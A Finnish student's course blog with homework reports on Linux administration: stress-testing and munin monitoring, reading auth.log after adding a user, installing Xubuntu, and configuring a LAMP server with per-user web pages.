Suoritin järjestelmän kuormitus- ja tarkkailutehtävän edellisen tehtävän johdosta asennetulla koneella.

Kuormitustietojen kerääminen ja järjestelmän kuormitus

Tehtävänannon mukaisesti käytin munin -ohjelmaa. Kaikessa yksinkertaisuudessaan sen ideana on kerätä tietoja järjestelmän kuormituksesta ja raportoida ne graafisten käyrien avulla.

Muninin asennus:
sudo apt-get update
sudo apt-get install munin
Testaus:
firefox /var/cache/munin/www/index.html

Munin vaikutti toimivan www-sivun avautumisen perusteella. Tässä vaiheessa kuormitusta esittävät käyrät näyttivät hyvin tyhjiltä.

Järjestelmän kuormittamiseen asensin stress -ohjelman:
sudo apt-get install stress
Testasin toiminnan avaamalla kaksi terminal -ohjelmaa. Ensimmäiseen käynnistin topin:
top
Toisella terminalilla suoritin kuormittamista:
stress -c 1

stress_test_with_top

Kuormituksen arviointi

Järjestelmän tilan tarkkailuun avasin neljä terminaalia. Kahteen avasin top ohjelman. Sorttasin topit siten, että toinen näytti prosessit prosessorin käytön mukaan(cpu top) ja toinen muistin käytön perusteella(mem top). Kolmanteen terminaaliin avasin iotopin komennolla: sudo iotop -oa. Neljännessä terminaalissa seurasin muistin ja swapin käyttöä ajelemalla komentoa: free -m. Lisäksi tarkkailin lämpötiloja psensors -ohjelmalla.

Ennen testailun aloittamista nollasin swapin askubuntu.comin ohjeen mukaan, jotta sen käytön seuraaminen olisi helpompaa.
sudo swapoff -a
sudo swapon -a

Aluksi kuormitin konetta komennolla:
stress --cpu 8 --io 8 --vm 1 --vm-bytes 1028M

stressing1

Päätelmät kuvasta:

  • Prosessoria käytetään täydellä teholla (userin toimesta 57,6% ja systemin toimesta 42,4%)
  • Muistin käyttö on vähäistä ja swapin lähes olematonta
  • Kiintolevyltä ei lueta eikä sinne kirjoiteta

Seuraavaksi halusin kiintolevylle tapahtumia ja lisäsin stressille parametrin –hdd.
stress --cpu 8 --io 8 --hdd 1 --vm 1 --vm-bytes 1028M

stressing2

Kiintolevyllä rupesi heti tapahtumaan. Kuvassa sinne kirjoitetaa 170.28M vauhdilla. Psensorista on helposti nähtävissä kuinka prosessorin lämpötila laskee kuormitustestien välissä.

Tähän mennessä swap osio on saanut olla varsin rauhassa. Halusin testata sen käyttäytymistä ja muokkasin stressin –vm parametria.
stress --cpu 8 --io 8 --hdd 1 --vm 10 --vm-bytes 1028M

stressing3

Vasemman alanurkan free -m osoittaa tyylikkäästi kuinka ennen testin aloitusta keskusmuistia on vapaana 5119m ja testin aloituksen jälkeen luku romahtaa arvoon 283m. Myös swap osio otetaan heti käyttöön ja sen seurauksena kiintolevylle kirjoitus kasvaa ja sieltä ruvetaan lukemaan.

Munin analysointi

Asensin muninin hyvissä ajoin ennen tämän raportin kirjoitusta. Tavoitteenani oli saada aikaan vähän enemmän käyriä. Alunperin tarkoituksenani oli käyttää järjestelmää satunnaisesti ja muun ajan antaa pyöriä omalla painollaan. Stressiä testaillessa olin kuintekin unohtanut sen päälle. Huomasin tapahtuneen erehdyksen CPU usage – by week käyrästä.

cpu-week

Viikko näkymä osoittaa login keräämisen aloitusajankohdaksi (=munin asennus) 28.1.2014 noin klo.12.00. Aluksi prosessoria on kuormitettu noin puolella teholla. Tämän jälkeen noin 6:n tunnin ajan järjestelmä on saanut huilata, kunnes olen aloittanu stress testin ja unohtanut sen käyntiin.

cpu-day

Päivä näkymästä näki vielä tarkemmin unohtuneen stress testin. Kuten myös ajankohdan jolloin huomasin tapahtuneen ja tapoin stress prosessit. Lopussa on vielä tapahtumat jotka syntyivät tässä postauksessa kuvaamistani testeistä.

mem-day

Memory usage – by day käyrästä on niin ikään hyvin nähtävissä stress kohellukseni. Lisäksi voidaan päätellä järjestelmässä olevan 8GB keskusmuistia, joka on ollut varsin riittävä ja vapaata tilaa on ollut reilusti. Oikeasta yläkulmasta on nähtävissä merkkejä swap osion käytöstä, jotka ovat seurausta stress kokeiluista.

uptime-week

Uptime – by week osoittaa järjestelmän käynnistyneen 28.1.2014 noin klo 12.00 ja olevan edelleen käynnissä.

Loki merkinnän aiheuttaminen ja analysointi

Asetin tavoitteeksi merkinnän aiheuttamisen auth.logiin.

Seurasin lokin tapahtumia komennolla:
tail -f /var/log/auth.log
Avasin uuden terminaalin ja ajoin komennon:
sudo adduser lokitesti
Ohjelma pyysi asettamaan käyttäjälle salasanan ja perustiedot. Samaan aikaan seurasin auth.login tapahtumia. Käyttäjän luonti aiheutti seuraavat merkinnät:

Jan 30 15:06:56 tuukka-xubuntu sudo:   tuukka : TTY=pts/1 ; PWD=/home/tuukka ; $
Jan 30 15:06:56 tuukka-xubuntu sudo: pam_unix(sudo:session): session opened for$
Jan 30 15:06:56 tuukka-xubuntu groupadd[1575]: group added to /etc/group: name=$
Jan 30 15:06:56 tuukka-xubuntu groupadd[1575]: group added to /etc/gshadow: nam$
Jan 30 15:06:56 tuukka-xubuntu groupadd[1575]: new group: name=lokitesti, GID=1$
Jan 30 15:06:56 tuukka-xubuntu useradd[1579]: new user: name=lokitesti, UID=100$
Jan 30 15:07:02 tuukka-xubuntu passwd[1587]: pam_unix(passwd:chauthtok): passwo$
Jan 30 15:07:02 tuukka-xubuntu passwd[1587]: gkr-pam: couldn't update the login$
$mation
Jan 30 15:07:04 tuukka-xubuntu chfn[1588]: changed user 'lokitesti' information
Jan 30 15:07:06 tuukka-xubuntu sudo: pam_unix(sudo:session): session closed for user root

Lokin jokainen rivi alkaa aikaleimalla, joka kertoo merkinnän kirjaamisen ajankohdan.

Ensimmäisellä rivillä kerrotaan sudo käskystä käyttäjän tuukka toimesta. Sudolla luodaan käyttäjä lokitesti adduser komennolla.

Toisella rivillä ilmoitetaan istunnon avaamisesta (session opened) root käyttäjälle. Tästä voidaan päätellä käyttäjän tuukka antaneen oikean root salasanan, joka vaaditaan sudo käskyn toimimiseen.

Seuraavat seitsemän riviä kertovat adduser -ohjelman vaiheista käyttäjän luonnissa ja sen asetuksien asettamisessa. Näistä selviää mm. käyttäjän ryhmä ja kotihakemiston sijainti.

Lopuksi kerrotaan root käyttäjän istunnon päättyneen. Josta voidaan päätellä adduser ohjelman suorittaneen käyttäjän luonnin loppuun.

Lähteet:

http://askubuntu.com/questions/1357/how-to-empty-swap-if-there-is-free-ram

http://terokarvinen.com/2013/aikataulu-%E2%80%93-linux-palvelimena-ict4tn003-11-ja-12-kevaalla-2014

Karvinen, Tero: Oppitunnit 2013-01-27, Linux palvelimena -kurssi

Linux palvelimena #1 – asennus ja konfigurointi

January 23, 2014

Tehtävä: peruskurssin kokeen ratkaisu ja raportointi.

Työaseman asennus

Päätin toteuttaa työaseman Xubuntu 12.04 Precise Pangolin käyttöjärjestelmällä. Olin jo aikaisemmin polttanut asennus-dvd:n ja testannut sen toimivaksi. Suoritin Xubuntun asennuksen seuraavanlaiseen tietokoneeseen:

  • Emolevy: Asus Z87-C
  • Prosessori: Intel Core i5-4670K 3.40GHz
  • Keskusmuisti: 8GB DDR3 1600MHz
  • Kiintolevy: 120GB SSD Sata 3.0
  • Näytönohjain: Geforce GTX 560 Ti Phantom, 2GB GDDR5 (Gainward)
  • Asema: Asus cd/dvd

Aloitin asennuksen käynnistämällä tietokoneen ja asettamalla asennuslevyn asemaan. Ennen asennusohjelmaan pääsyä muokkasin BIOS asetuksista käynnistysjärjestyksen.

IMG_2025

Xubuntun asennusohjelmasta valtisin paikallisen asennuksen (Install Xubuntu). Asennustavaksi valitsin manuaalisen osioinnin. Poistin kaikki vanhat osiot ja loin noin keskusmuistin suuruisen swap osion ja itse järjestelmälle osion “/” mount pointilla Ext4 tiedostojärjestelmää käyttäen.

IMG_2027

Tähän mennessä aikaa oli kulunut noin 30minuuttia. Prosessia hidasti lähinnä raportointi. Normaalisti toimenpiteet osiointivaiheeseen pääsyyn käyvät nopeasti. Arviolta noin viidessä minuutissa.

Aloitin järjestelmän asennuksen klo 14.30.

Xubuntun asennuksen aikana ilmoitin sijaintini ja valitsin suomalaisen näppäimistö asettelun.

Xubuntun sisäänkirjautumisikkuna avautui klo 14.38.

Pidin asennusprosessia(8minuuttia) varsin nopeana. Arvioisin käytössä olleen laitteiston suoritintehon ja erityisesti SSD kiintolevyn vaikuttaneen positiivisesti lopputulokseen.

Sisäänkirjautumisen jälkeen järjestelmä vaikutti päällisin puolin toimivalta.

Avasin oletuksena asentuneen Firefox selaimen ja havaitsin verkkoyhteyden toimivan. Siirryin youtube.com sivustolle ja selain huomautti puuttuvasta Adobe Flash Player sovelluksesta. Asensin sen selaimen asennusohjelmaa apuna käyttäen ja youtube videot toimivat, mutta ilman ääniä.

Etsin Xubuntun Update Managerista mahdollisesti oletuksena tarjottavaa ajuria äänipiirille ja löysin PulseAudio sound serverin. Asensin sen Update Manageria käyttäen. Heti asennuksen jälkeen äänet toimivat.

Tekstinkäsittelyä ja muita toimiston perusrutiineja varten Xubuntun mukana tuli esiasennettuna Libre Office. Totesin työaseman olevan valmis kellon ollessa 14.50.

Palvelimen konfigurointi PHP-sivujen kehitykseen etäkäyttöyhteydellä, käyttäjien luonti palvelimelle ja mystatus shell-skriptin asennus

Jatkoin tehtävän tekoa samalla tietokoneella ja vasta asentamallani Xubuntulla. Tässä kohtaa unohdin kellon tarkan seuraamisen ja seuraavat kellonajat ovat noin aikoja.

Aloitin asentamalla ja testaamalla SSH yhteyden.

sudo apt-get update
sudo apt-get install openssh-server
su – esimerkkikayttaja
whoami

Apachen, mysql:n ja php:n  asennukseen päätin käyttää tasksel työkalua, jolla on mahdollista asentaa useampi paketti samalla kerralla(meta pakettien tapaan). Käytin ohjeena ubuntun kotisivuilta löytyvää julkaisua. Suoritin seuraavat komennot komentokehotteessa:

sudo apt-get install tasksel
sudo tasksel install lamp-server
sudo /etc/init.d/apache2 stop
sudo /etc/init.d/apache2 start

Tämän jälkeen selvitin koneen ip-osoitteen komennolla sudo ifconfig. Avasin selaimen ja syötin osoiteriville ifconfigin antaman osoitteen. Esimerkkisivu avautui ja apache osoittautui toimivaksi.

Tässä kohtaa kello oli 15.10

Tämän jälkeen ihmettelin pitkään miten saikaan toimimaan apachen kaikille käyttäjille. Halusin esimerkiksi pekka käyttäjän kotisivut sijaitsemaan hakemistoon /home/pekka/public_html/.

Löysin ohjeet edellä mainitsemastani ubuntu.comin julkaisusta kohdasta Virtual Host. Julkaisu ohjasi hieman väärin. Siinä kehotettiin muokkaamaan tiedostoa /etc/apache2/sites-available/000-default.conf jota en kuitenkaan ikinä löytänyt. Sen sijaan löysin tiedoston /etc/apache2/sites-available/default. Muokkasin sitä Virtual Host oppaan mukaan.

DocumentRoot /var/www muutin muotoon -> DocumentRoot /home/user/public_html

<Directory /var/www/> muutin muotoon ->  <Directory /home/user/public_html>

Tämän jälkeen copy pastesin komentoriville seuraavan komennon: sudo a2dissite default && sudo a2ensite mysite

Mikään ei tietenkään toiminut ja selvitin ongelmaa yli tunnin. Oppaassa pyydettiin alunperin muuttamaan asetustiedoston nimeksi “mysite”. Tätä en tehnyt vaan jätin sen muotoon “default”. Ongelman ajattelin ratkeavan ajamalla komennon: sudo a2dissite default && sudo a2ensite default.

Sivut eivät vieläkään toimineet haluamallani tavalla. Etsin tietoa monesta paikasta ilman tulosta. Viimein turvauduin Janne Kuuselan blogiin. Janne oli ratkaissut ongelman ajamalla komennon sudo a2enmod userdir ja sen jälkeen käynnistämällä apachen uudelleen komennolla sudo service apache2 restart. Tämän jälkeen kaikki toimi haluamallani tavalla ja käyttäjän pekka tiedostot löytyivät osoitteesta http://localhost/~pekka.

Epäilisin ubuntun sivuilla olevan oppaan ohjeiden olevan eri versioon kuin käytössäni ollut Xubuntu 12.04.

Php:n testauksen aloin klo 17.30. Loin testi tiedoston käyttäjälle pekka. Siirryin selaimessa osoitteeseen http://localhost/~pekka/hello.php. Sivu ei avautunut vaan selain yritti ladata php tiedostoa. Etsin pitkään ratkaisua ongelmaan. Ubuntu.comin julkaisussa tarjottiin ratkaisuksi public_html kansion käyttöoikeuksien tarkistusta, selaimen historian tyhjennystä ja verkko-osoitteen tarkistusta. Kaikki olivat kunnossa, mutta edelleenkään hello.php-sivu ei auennut vaan latautui. Löysin viimein ratkaisun Janne Kuuselan blogista. Editoin tiedostoa, /etc/apache2/mods-enabled/php5.conf komennolla sudo nano /etc/apache2/mods-enabled/php5.conf ja laitoin seuraavien rivien eteen risuaidan(#):

#    <IfModule mod_userdir.c>
  #        <Directory /home/*/public_html>
  #            php_admin_value engine Off
  #        </Directory>
  #    </IfModule>

Tämän muokkauksen jälkeen testasin uudestaan siirtyä pekan hello.php sivulle ja kaikki toimi loistavasti.

Viimeisen vaiheen eli skriptin teon ja käyttäjien luonnin aloitin klo 17.45.

Loin käyttäjät työntekijöille sudo adduser einava, sudo adduser pekkawin, sudo adduser akean, sudo adduser leilalaSeuraavaksi suoritin komennon sudo nano mystatus.sh ja lisäsin sisällöksi

#!/bin/bash
 df -h
 ip addr

Lopuksi kopioin skriptin sudo cp mystatus.sh /usr/bin/ ja lisäsin suoritus käyttöoikeuden sudo chmod +x /usr/bin/mystatus.sh.

Testasin järjestelmän vielä kirjautumalla ssh yhteydellä jokaisen käyttäjän tunnuksella. Luomalla esimerkki php sivut käyttäjille ja ajamalla mystatus skriptin käyttäjien kotihakemistossa. Totesin järjestelmän toimivan klo 18.30.

Lähteet:

https://help.ubuntu.com/community/ApacheMySQLPHP
Linux palvelimena ict4tn003-10 syksyllä 2013 – Kotitehtävä h1
Karvinen, Tero: Oppitunnit 2013-01-20, Linux palvelimena -kurssi

Tätä dokumenttia saa kopioida ja muokata GNU General Public License (versio 2 tai uudempi) mukaisesti. http://www.gnu.org/licenses/gpl.html
Pohjana Tero Karvinen 2014: Linux palvelimena -kurssi, http://terokarvinen.com

Xubuntu asennus/live-dvd:n poltto

January 21, 2014

Linux palvelimena kurssin ensimmäinen kotitehtävä oli peruskurssin kokeen teko ja raportointi. Kokeen suorittamista varten tarvitsin toimivan Linux asennuslevyn.

Valitsin distroksi Xubuntu 12.04 Precise Pangolin ja latasin sen torrenttina osoitteesta: http://torrent.ubuntu.com/xubuntu/releases/precise/release/desktop/xubuntu-12.04.3-desktop-i386.iso.torrent

Latauksen valmistuttua poltin xubuntu-12.04.3-desktop-i386.iso:n Verbatimin DVD+R levylle seuraavanlaisella laitteistolla:

MacBook Pro – 13-inch, Mid 2012
Processor: 2,9GHz Intel Core i7
Memory: 8 GB 1600MHz DDR3
Graphics: Intel HD Graphics 4000 512 MB
OS: Mac OS X Lion 10.7.5

Polttoon käytin OS X:n omaa Disk Utility sovellusta.

Testasin levyn toimivuuden käynnistämällä Xubuntun live version dvd:ltä.

– Tuukka

Let there be blog!

January 20, 2014

Noin vuosi sitten päätin, että nyt tai ei koskaan on viimein aika opiskella tosissaan. Tänään on päivä jolloin päätökseni kantoi hedelmää. Opinnot Haaga-Heliassa Tietojenkäsittelyn koulutusohjelmassa alkoivat. Fiilis on mitä mahtavin. :]

Heti kärkeen ilmoittauduin vapaaehtoiselle Tero Karvisen opettamalle Linux palvelimena kurssille, jota eräs kaverini oli suositellut. Valinta osoittautui erittäin loistavaksi ja heti ensimmäisenä koulupäivänä päästiin tosi toimiin ja vieläpä itselle niin rakkaan aiheen parissa.

Karvisen innoittamana päädyin perustamaan tämän blogin. Tarkoituksena on pitää jonkinlaista “päiväkirjaa” opinnoista ja julkaista osa koulutehtävistä. Myöhemmässä vaiheessa myös harraste projekteja saattaa tänne ilmaantua.

– Tuukka